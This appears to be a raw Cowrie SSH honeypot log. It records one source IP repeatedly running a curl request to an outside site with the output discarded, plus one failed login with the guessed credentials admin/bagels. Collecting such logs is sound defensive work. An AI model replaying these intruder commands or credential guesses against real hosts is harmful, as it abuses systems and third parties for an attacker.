{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.284829Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.285915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.322915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.323997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.361447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.363208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.400892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.401989Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.438936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.439986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.490270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.491729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.529186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.530283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.569124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.570227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.609602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.610622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.648636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.649648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.688746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.689830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.728323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.729368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.770401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.771434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.836111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.837131Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.875565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.876619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.927902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.929028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:31.967546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:31.969051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.008407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.009439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bagels","message":"login attempt [admin/bagels] failed","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.036377Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.048344Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.049314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.089800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.090823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.127693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.128754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.167311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.169055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.226135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.227181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.263778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.265130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.302885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.304178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.354813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.355832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.393669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.394647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.432672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.433677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.471611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.472615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.510224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.511276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.550823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.551825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.588412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.589391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.626340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.627270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.664419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.665468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.702141Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.703128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.751553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.752879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.790197Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.791098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.828459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.829441Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.866202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.867665Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.904520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.905535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.949499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.950580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:32.988245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:32.989191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.026521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.027728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.064828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.065755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.097244Z","src_ip":"212.227.125.160","session":"4c304f98ee6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.102959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.103827Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.150447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.151439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.188287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.189287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.228981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.229944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.268281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.269291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.310792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.311913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.348583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.349657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.387653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.388927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.425783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.426684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.464194Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.465173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.502134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.503391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.552253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.553217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.589815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.590776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.627963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.628889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.665493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.666580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.704317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.705615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.744763Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.745760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.784783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.785844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.824162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.825203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.868181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.869223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:33.924075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
